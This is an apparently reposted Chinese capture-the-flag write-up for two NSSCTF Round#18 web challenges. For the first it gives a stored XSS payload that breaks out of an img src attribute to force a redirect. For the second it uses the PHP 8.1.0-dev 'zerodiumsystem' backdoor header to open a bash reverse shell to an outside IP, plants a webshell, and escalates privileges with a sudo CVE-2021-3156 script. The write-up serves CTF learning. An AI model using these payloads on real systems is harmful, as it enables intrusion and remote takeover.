目录
①门酱想玩什么呢?
②Becomeroot
①门酱想玩什么呢?
先试一下随便给个链接
![图片[1] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/5fa80ec009f04592a72704ff32462375.png)
不能访问远程链接,结合评论区功能,不难联想到xss,只要给个评论区链接让门酱访问就可
我们研究下评论区
![图片[2] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/0134fdcf672c4556bfb08020c291b5cb.png)
从评论区知道,要让门酱玩元梦之星,考虑直接
document.location=”https://ymzx.qq.com/”;
尝试传了发现不能起作用跳转,估计是这些被html实体化了
![图片[3] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/ba161f2001704e79aab8000ce35ae436.png)
那咋整呢,题目里还提供了评论插入图片功能
我们就按示例传一下(必须以http://开头,否则不能解析为图片)
![图片[4] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/40977fb98a7e41c792fdb93f6155c1a9.png)
![图片[5] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/8be57cc2ad4e4c9a895a60049bdb61ad.png)
链接是插入到了src中,我们可以直接用”>闭合img标签
评论传
http://">document.location="https://ymzx.qq.com/";.png 123 /png成功重定向到元梦之星官网
![图片[6] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/adcae57079f64e7b93441b7204039311.png)
bp抓包
![图片[7] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/4c821bdcdf4e4e6da6b6abb406d9fdd1.png)
获得该条恶意评论链接
http://node1.anna.nssctf.cn:28834/words/" />
②Becomeroot
进来直接告诉我们php版本是8.1.0-dev
![图片[8] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/5ac5fd920ef54a718d8941ef8c4c6812.png)
![图片[8] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](data:image/svg+xml,%3Csvg%20xmlns=%22http://www.w3.org/2000/svg%22%20viewBox=%220%200%20210%20140%22%3E%3C/svg%3E)
PHP-8.1.0-dev 后门命令执行漏洞复现_php/8.1.0-dev-CSDN博客
User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/124.222.136.33/1337 0>&1'");
![图片[9] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/ee9dd506670a4a049330e2d3a686daa4.png)
直接反弹shell,发现要提权
![图片[10] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/bbb4fd7c49394bb2b83e4c41a0580370.png)
![图片[11] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/c013128db8d346a9b84c425d993eb525.png)
GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令
脚本不太好整到靶机上,还是写马连webshell方便点
User-Agentt: zerodiumsystem("echo '
![图片[12] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/7ecf4ab903ac4c619c7ec5f7fa0ae9ce.png)
![图片[13] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/becd019a33dc41faaeff0ef024bbe6b5.png)
尝试用suid提权插件来整,失败
![图片[14] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/a5e437fd13284b7cb38645057383f861.png)
发现题目提示:
![图片[15] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/ec1733abb0fe4355871b22b2af33c9d5.png)
看一下sudo版本
![图片[16] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/db455f3c6dc14b248ac2b38b4717521c.png)
不难找到对应CVE
CVE-2021-3156 sudo权限提升漏洞
GitHub - Rvn0xsy/CVE-2021-3156-plus: CVE-2021-3156非交互式执行命令脚本传到服务器的/tmp目录下
![图片[17] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/53f0862c728d45a0be59e28142e0eb22.png)
进行提权,直接rce
![图片[18] - 【Web】NSSCTF Round#18 Basic个人wp(部分) - MaxSSL](https://www.maxssl.com/uploads/?url=https://img-blog.csdnimg.cn/direct/55a1feda316a48b68bbcdbcac1063b44.png)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
